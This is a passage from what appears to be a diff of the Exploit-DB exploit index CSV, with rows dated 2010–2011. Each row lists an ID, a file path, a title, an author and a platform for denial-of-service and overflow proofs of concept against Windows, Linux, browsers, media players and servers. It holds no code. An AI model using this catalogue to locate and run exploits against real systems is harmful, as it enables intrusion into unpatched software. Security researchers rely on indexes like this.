with Reused Transaction GUID (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos, -14668,exploits/windows/dos/14668.txt,"Microsoft Windows - Win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",windows,dos, -14669,exploits/windows/dos/14669.txt,"Microsoft Windows - Win32k!GreStretchBltInternal() Does Not Handle src == dest",2010-08-17,"Tavis Ormandy",windows,dos, -14670,exploits/windows/dos/14670.txt,"Microsoft Windows - nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos, -14671,exploits/windows/dos/14671.py,"Brazip 9.0 - '.zip' Buffer Overflow (SEH)",2010-08-17,ITSecTeam,windows,dos, -14687,exploits/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN - ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos, -14678,exploits/php/dos/14678.txt,"PHP 5.3.3 - 'ibase_gen_id()' Off-by-One Overflow",2010-08-18,"Canberk BOLAT",php,dos, -14679,exploits/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service",2010-08-18,"C.G. Tan",windows,dos, -14683,exploits/windows/dos/14683.py,"httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)",2010-08-18,Dr_IDE,windows,dos, -14685,exploits/windows/dos/14685.pl,"RockN Wav Editor 1.8 - Denial of Service",2010-08-18,d4rk-h4ck3r,windows,dos, -14689,exploits/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service",2010-08-19,d4rk-h4ck3r,windows,dos, -14690,exploits/windows/dos/14690.pl,"Fennec 1.2 Beta 3 - Denial of Service",2010-08-19,d4rk-h4ck3r,windows,dos, -14695,exploits/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service",2010-08-20,PASSEWORD,windows,dos, -14698,exploits/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 - '.m3u' Denial of Service",2010-08-20,b0telh0,windows,dos, -14699,exploits/windows/dos/14699.py,"PlayPad Music Player 1.12 - '.mp3' Denial of Service",2010-08-20,"Praveen Darshanam",windows,dos, -14705,exploits/windows/dos/14705.c,"Microsoft Windows - IcmpSendEcho2Ex Interrupting Denial of Service",2010-08-21,l3D,windows,dos, -14711,exploits/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service",2010-08-23,41.w4r10r,windows,dos, -14713,exploits/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 - Denial of Service",2010-08-23,41.w4r10r,windows,dos, -14761,exploits/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos, -14767,exploits/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos, -14824,exploits/windows/dos/14824.txt,"LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow",2010-08-28,LiquidWorm,windows,dos, -14832,exploits/windows/dos/14832.rb,"SnackAmp 3.1.2 - '.wav' Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos, -14840,exploits/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial of Service",2010-08-30,"CwG GeNiuS",windows,dos, -14843,exploits/windows/dos/14843.txt,"Apple QuickTime - '_Marshaled_pUnk' Backdoor Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta",windows,dos, -14852,exploits/windows/dos/14852.txt,"LeadTools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos, -14858,exploits/windows/dos/14858.txt,"Autodesk MapGuide Viewer - ActiveX Denial of Service",2010-09-01,d3b4g,windows,dos, -14869,exploits/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution",2010-09-02,Abysssec,windows,dos, -14866,exploits/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos, -14882,exploits/windows/dos/14882.txt,"FFDshow - Overflow (SEH) Exception Leading to Null Pointer on Read",2010-09-03,"Matthew Bergin",windows,dos, -14883,exploits/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos, -14892,exploits/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos, -14904,exploits/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos, -14909,exploits/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)",2010-09-05,"Abhishek Lyall",windows,dos, -14916,exploits/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos, -14928,exploits/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos, -14937,exploits/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos, -14938,exploits/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos, -14947,exploits/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos, -14949,exploits/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos, -14967,exploits/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos, -14971,exploits/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos, -14974,exploits/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 (Multiple Modules) - Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos, -14987,exploits/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos, -14990,exploits/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash (PoC)",2010-09-13,SONIC,windows,dos, -14992,exploits/windows/dos/14992.py,"RealPlayer - FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos, -15008,exploits/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos, -15017,exploits/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - '.mp3' / '.wma' Denial of Service",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos, -15019,exploits/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution",2010-09-16,Abysssec,windows,dos, -15193,exploits/windows/dos/15193.pl,"Hanso Player 1.3.0 - '.m3u' Denial of Service",2010-10-03,"xsploited security",windows,dos, -15027,exploits/windows/dos/15027.py,"Mozilla Firefox 3.6.4 - 'Plugin' EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,windows,dos, -15032,exploits/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 - '.wav' / '.mp3' Denial of Service",2010-09-17,modpr0be,windows,dos, -15034,exploits/windows/dos/15034.txt,"Microsoft Mspaint - '.bmp' Crash (PoC)",2010-09-18,andrew,windows,dos, -15035,exploits/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos, -15054,exploits/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow (PoC)",2010-09-19,The_UnKn@wn,linux,dos, -15061,exploits/windows/dos/15061.txt,"Microsoft DRM Technology - 'msnetobj.dll' ActiveX Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos, -15062,exploits/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename init() .bss' (PoC)",2010-09-20,Stoke,linux,dos, -15065,exploits/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos, -15076,exploits/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos, -15112,exploits/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)",2010-09-26,Abysssec,windows,dos, -15086,exploits/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution",2010-09-23,Abysssec,multiple,dos, -15088,exploits/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption",2010-09-23,Abysssec,windows,dos, -15096,exploits/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos, -15103,exploits/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",windows,dos, -15104,exploits/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos, -15122,exploits/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing",2010-09-27,Abysssec,windows,dos, -15131,exploits/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - '.m3u' Denial of Service",2010-09-27,4n0nym0us,windows,dos, -15148,exploits/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos, -15158,exploits/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)",2010-09-30,Abysssec,windows,dos, -15167,exploits/windows/dos/15167.txt,"Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)",2010-10-01,kingcope,windows,dos, -15188,exploits/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service",2010-10-02,m0ebiusc0de,ios,dos, -15212,exploits/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud & nSense",osx,dos, -15214,exploits/win_x86/dos/15214.py,"HP Data Protector Media Operations - Null Pointer Dereference Remote Denial of Service",2010-10-06,d0lc3,win_x86,dos,19813 -15215,exploits/multiple/dos/15215.txt,"libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos, -15598,exploits/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - '.m3u8' Buffer Overflow",2010-11-23,anT!-Tr0J4n,windows,dos, -15229,exploits/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos, -15242,exploits/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos, -15243,exploits/windows/dos/15243.html,"Oracle Java - APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos, -15245,exploits/solaris/dos/15245.txt,"Oracle Solaris - 'su' Crash",2010-10-13,prdelka,solaris,dos, -15248,exploits/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos, -15250,exploits/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,windows,dos, -15263,exploits/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",windows,dos, -15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure (Python)",2010-10-16,ZoRLu,aix,dos, -15257,exploits/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos, -15258,exploits/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos, -15259,exploits/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",windows,dos, -15260,exploits/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",windows,dos, -15261,exploits/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos, -15262,exploits/windows/dos/15262.txt,"Microsoft Office - 'HtmlDlgHelper' Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",windows,dos, -15267,exploits/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos, -15273,exploits/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos, -15283,exploits/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos, -15302,exploits/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service",2010-10-22,"MOHAMED ABDI",windows,dos, -15301,exploits/windows/dos/15301.pl,"Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow",2010-10-21,LiquidWorm,windows,dos, -15293,exploits/linux/dos/15293.txt,"LibSMI smiGetNode - Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos, -15297,exploits/windows/dos/15297.txt,"Microsoft Windows Mobile 6.1/6.5 - Double-Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos, -15305,exploits/windows/dos/15305.pl,"RarmaRadio 2.53.1 - '.m3u' Denial of Service",2010-10-23,anT!-Tr0J4n,windows,dos, -15306,exploits/win_x86/dos/15306.pl,"AnyDVD 6.7.1.0 - Denial of Service",2010-10-23,Havok,win_x86,dos, -15319,exploits/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos, -15334,exploits/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos, -15426,exploits/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos, -15341,exploits/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos, -15342,exploits/multiple/dos/15342.html,"Mozilla Firefox - Simplified Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos, -15346,exploits/multiple/dos/15346.c,"Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,multiple,dos, -15356,exploits/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos, -15378,exploits/windows/dos/15378.py,"Sybase Advantage Data Architect - '.SQL' Format Heap Overflow",2010-11-01,d0lc3,windows,dos, -15380,exploits/hardware/dos/15380.txt,"Xerox 4595 - Denial of Service",2010-11-01,chap0,hardware,dos, -15383,exploits/windows/dos/15383.c,"Rising - 'RSNTGDI.sys' Local Denial of Service",2010-11-02,ze0r,windows,dos, -15384,exploits/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service",2010-11-02,"Nikita Tarakanov",windows,dos, -15394,exploits/windows/dos/15394.txt,"Maxthon 3.0.18.1000 - CSS Denial of Service",2010-11-02,4n0nym0us,windows,dos, -15393,exploits/windows/dos/15393.pl,"Quickzip 5.1.8.1 - Denial of Service",2010-11-02,moigai,windows,dos, -15407,exploits/windows/dos/15407.txt,"Avira Premium Security Suite - 'NtCreateKey' Race Condition",2010-11-03,"Nikita Tarakanov",windows,dos, -15408,exploits/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service",2010-11-03,"Matthew Bergin",windows,dos, -15411,exploits/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - '.hta' Buffer Overflow",2010-11-04,anT!-Tr0J4n,windows,dos, -15418,exploits/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption",2010-11-04,anonymous,windows,dos, -15419,exploits/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption",2010-11-04,scup,windows,dos, -15420,exploits/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local Denial of Service (PoC)",2010-11-04,"Nikita Tarakanov",windows,dos, -15422,exploits/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Denial of Service",2010-11-05,wingthor,windows,dos, -15428,exploits/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos, -15429,exploits/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos, -15431,exploits/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos, -15432,exploits/windows/dos/15432.html,"LeadTools 11.5.0.9 - 'ltisi11n.ocx' DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos, -15433,exploits/windows/dos/15433.html,"LeadTools 11.5.0.9 - 'ltlst11n.ocx' Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos, -15434,exploits/windows/dos/15434.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos, -15435,exploits/windows/dos/15435.html,"LeadTools 11.5.0.9 - 'lttmb11n.ocx' BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos, -15436,exploits/windows/dos/15436.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos, -15444,exploits/windows/dos/15444.txt,"G Data TotalCare 2011 - 'NtOpenKey' Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos, -15494,exploits/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos, -15495,exploits/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos, -15458,exploits/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos, -15463,exploits/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos, -15464,exploits/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos, -15467,exploits/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service",2010-11-09,"Shane Bester",multiple,dos, -15474,exploits/multiple/dos/15474.txt,"IBM OmniFind - Buffer Overflow",2010-11-09,"Fatih Kilic",multiple,dos, -15476,exploits/multiple/dos/15476.php,"IBM OmniFind Crawler - Denial of Service",2010-11-09,"Fatih Kilic",multiple,dos, -15482,exploits/windows/dos/15482.html,"Qtweb Browser 3.5 - Buffer Overflow",2010-11-10,PoisonCode,windows,dos, -15491,exploits/osx/dos/15491.txt,"Apple Directory Services - Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos, -15493,exploits/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 - '.wav' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos, -15504,exploits/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow",2010-11-13,"Trustwave's SpiderLabs",hardware,dos, -15508,exploits/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera - Denial of Service",2010-11-13,"Trustwave's SpiderLabs",hardware,dos, -15514,exploits/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow",2010-11-13,dookie,windows,dos, -15558,exploits/multiple/dos/15558.html,"Apple Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos, -15580,exploits/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow",2010-11-20,LiquidWorm,windows,dos, -15581,exploits/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption",2010-11-20,LiquidWorm,windows,dos, -15582,exploits/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - '.NKI' File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,windows,dos, -15583,exploits/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos, -15613,exploits/windows/dos/15613.py,"NCH Officeintercom 5.20 - Remote Denial of Service",2010-11-25,"xsploited security",windows,dos, -15619,exploits/linux/dos/15619.c,"Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos, -15622,exploits/linux/dos/15622.c,"Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos, -15628,exploits/windows/dos/15628.py,"Hanso Player 1.4.0 - '.m3u' Denial of Service",2010-11-28,anT!-Tr0J4n,windows,dos, -15632,exploits/windows/dos/15632.py,"FoxPlayer 2.4.0 - Denial of Service",2010-11-29,"Oh Yaw Theng",windows,dos, -15635,exploits/windows/dos/15635.py,"Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)",2010-11-30,0v3r,windows,dos, -16012,exploits/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow Denial of Service",2011-01-18,"Vuk Ivanovic",windows,dos, -15649,exploits/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - Null Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos, -15657,exploits/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 - Denial of Service",2010-12-02,h1ch4m,windows,dos, -15669,exploits/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos, -15670,exploits/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos, -15671,exploits/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos, -15674,exploits/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)",2010-12-04,"Vuk Ivanovic",windows,dos, -15676,exploits/multiple/dos/15676.txt,"Wireshark - LDSS Dissector Buffer Overflow",2010-12-04,"Nephi Johnson",multiple,dos, -15694,exploits/windows/dos/15694.txt,"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos, -15695,exploits/windows/dos/15695.txt,"WinZip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos, -15697,exploits/windows/dos/15697.html,"AVG Internet Security 2011 - Safe Search for IE Denial of Service",2010-12-06,Dr_IDE,windows,dos, -15698,exploits/windows/dos/15698.html,"Flash Player - 'Flash6.ocx' AllowScriptAccess Denial of Service (PoC)",2010-12-06,Dr_IDE,windows,dos, -15705,exploits/linux/dos/15705.txt,"GNU InetUtils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos, -15707,exploits/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",multiple,dos, -15708,exploits/windows/dos/15708.html,"Microsoft Internet Explorer 8 - CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos, -15722,exploits/multiple/dos/15722.txt,"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos, -15803,exploits/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos, -15738,exploits/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos, -15739,exploits/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos, -15750,exploits/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities",2010-12-16,modpr0be,windows,dos, -15758,exploits/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos, -15767,exploits/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",windows,dos, -15786,exploits/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos, -15787,exploits/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos, -15788,exploits/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos, -15792,exploits/hardware/dos/15792.php,"Apple iOS Safari - body alink Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos, -15794,exploits/hardware/dos/15794.php,"Apple iOS Safari - 'decodeURI' Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos, -15796,exploits/hardware/dos/15796.php,"Apple iOS Safari - 'decodeURIComponent' Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos, -15805,exploits/hardware/dos/15805.php,"Apple iOS Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos, -15821,exploits/windows/dos/15821.py,"HttpBlitz Web Server - Denial of Service",2010-12-24,otoy,windows,dos, -15839,exploits/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos, -15845,exploits/windows/dos/15845.py,"IrfanView 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,windows,dos, -15851,exploits/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos, -15860,exploits/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)",2010-12-29,emgent,windows,dos, -15894,exploits/windows/dos/15894.c,"Microsoft Windows - Class Handling (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos, -15897,exploits/windows/dos/15897.py,"Music Animation Machine MIDI Player - Local Crash (PoC)",2011-01-03,c0d3R'Z,windows,dos, -15898,exploits/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos, -15905,exploits/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos, -15925,exploits/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service",2011-01-07,freak_out,windows,dos, -15935,exploits/linux/dos/15935.c,"GNU libc/regcomp(3) - Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos, -15940,exploits/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - RDS Service Remote Denial of Service",2011-01-08,Pepelux,windows,dos, -15946,exploits/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos, -15959,exploits/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos, -15973,exploits/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos, -15974,exploits/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument - Privilege Escalation",2011-01-11,"Chris Howie",linux,dos, -15986,exploits/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service",2011-01-13,"Craig Freyman",windows,dos, -15988,exploits/windows/dos/15988.py,"Objectivity/DB - Lack of Authentication",2011-01-14,"Jeremy Brown",windows,dos, -15992,exploits/windows/dos/15992.txt,"Sielco Sistemi Winlog 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos, -15998,exploits/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 'KisKrnl.sys' 2011.1.13.89 - Local Kernel Mode Denial of Service",2011-01-16,MJ0011,windows,dos, -16002,exploits/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos, -16021,exploits/windows/dos/16021.c,"Look n stop - Local Denial of Service",2011-01-21,Heurs,windows,dos, -16022,exploits/windows/dos/16022.c,"Panda Global Protection 2010 - Local Denial of Service",2011-01-21,Heurs,windows,dos, -16023,exploits/windows/dos/16023.c,"Panda Global Protection 2010 - Local Denial of Service (unfiltered wcscpy())",2011-01-21,Heurs,windows,dos, -16035,exploits/windows/dos/16035.py,"Inetserv 3.23 - SMTP Denial of Service",2011-01-23,G13,windows,dos, -16038,exploits/windows/dos/16038.py,"Inetserv 3.23 POP3 - Denial of Service",2011-01-24,dmnt,windows,dos, -16040,exploits/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)",2011-01-25,"Jeremy Brown",windows,dos, 